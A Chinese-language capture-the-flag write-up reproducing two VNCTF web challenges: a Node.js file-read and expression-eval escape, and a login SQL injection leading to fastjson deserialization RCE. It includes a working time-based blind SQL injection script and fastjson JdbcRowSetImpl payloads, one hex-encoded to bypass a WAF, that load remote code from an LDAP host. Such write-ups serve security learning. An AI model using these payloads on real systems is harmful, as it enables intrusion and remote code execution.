VNCTF 题目复现

navie

题目给了源码

 import express from "express";
import bindings from "bindings";
import { fileURLToPath } from 'url'
import path from "path";

import pkg from 'expression-eval';
const { eval: eval_, parse } = pkg;

const addon = bindings("addon");

const file = fileURLToPath(import.meta.url);

const app = express();
app.use(express.urlencoded({ extended: true }));

app.use(express.static("static"));

app.use("/eval", (req, res) => {
  const e = req.body.e;
  const code = req.body.code;
  if (!e || !code) {
    res.send("wrong?");
    return;
  }
  try {
    if (addon.verify(code)) {
      res.send(String(eval_(parse(e))));
    } else {
      res.send("wrong?");
    }
  } catch (e) {
    console.log(e)
    res.send("wrong?");
  }
});

app.use("/source", (req, res) => {
  let p = req.query.path || file;
  p = path.resolve(path.dirname(file), p);
  if (p.includes("flag")) {
    res.send("no flag!");
  } else {
    res.sendFile(p);
  }
});

app.use((err, req, res, next) => {
  console.log(err)
  res.redirect("index.html");
});

app.listen(process.env.PORT || 80);

该处存在一个任意文件读取

image.png

限制了不能使用flag关键字,读取proc等无果,命令执行的模块:

image.png

首先需要传入一个code

addon.verify(code)

满足该方法后即可,进入eval

至于code,看师傅们的博客都是利用之前的任意文件读取:

image.png

经过反编译后拿到code:

yoshino-s_want_a_gf,qq1735439536

image.png

接下来就是如何命令执行,nodejs命令执行方法:

https://xz.aliyun.com/t/7184 Threezh1师傅总结的

image.png

使用require抛出异常。

在github上能找到相应的payload

image.png

根据es6特性:

import('/modules/myModule.mjs')
  .then((module) => {
    // Do something with the module.
  });

image.png

没有回显,不出网,所以直接静态读取。

image.png

realezjvav

登陆处的sql注入:

image.png

根据返回包长度可以判断是否过滤:

1528为没有过滤,不能报错注入,不能dnslog,不能写文件,只剩盲注了,这里采用时间盲注,ban了sleep,benchmark,get_lock,这里采用笛卡尔积

经过测试大概2个table+一个columns最合适,构造编写脚本:

 
import requests
import time
url = "http://5ab905b8-3c2c-4bab-ad74-b108b6936868.node3.buuoj.cn/user/login"
i = 0
flag = ""
for i in range(1,50):
    f1=flag
    for j in range(32,128):
        p = "a' or (if((ascii(substr(password,{},1)))={},(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,information_schema.columns/**/B,information_schema.tables/**/C),1))#".format(i,j)
        data1 = {'username':'admin','password': p}
        try:
            # print(j)
            r1 = requests.post(url, data=data1, timeout=2)
        except requests.exceptions.ReadTimeout as e:
            flag += chr(j)
            print(flag)
            break
        except Exception as e:
            pass
        else:
            continue

这里参考了EDI师傅们的思路,利用timeout可以大大节省时间:

拿到密码
no_0ne_kn0w_th1s

image.png

进去之后:

image.png

存在任意文件读取:

image.png

有安装阿里的fastjson

搜索发现存在漏洞:

https://github.com/CaijiOrz/fastjson-1.2.47-RCE

image.png

存在waf,json支持unicode编码,fastjson还支持16进制编码

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}}
 roleJson={"name":{"\x40\x74\x79\x70\x65":"java.lang.Class","val":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c"},"x":{"\x40\x74\x79\x70\x65":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c","\x64\x61\x74\x61\x53\x6f\x75\x72\x63\x65\x4e\x61\x6d\x65":"ldap://x.x.x.x:7979/Exploit","\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74":true}}

确认存在漏洞:

image.png

接下来参考github

Last modification:April 19th, 2021 at 03:57 pm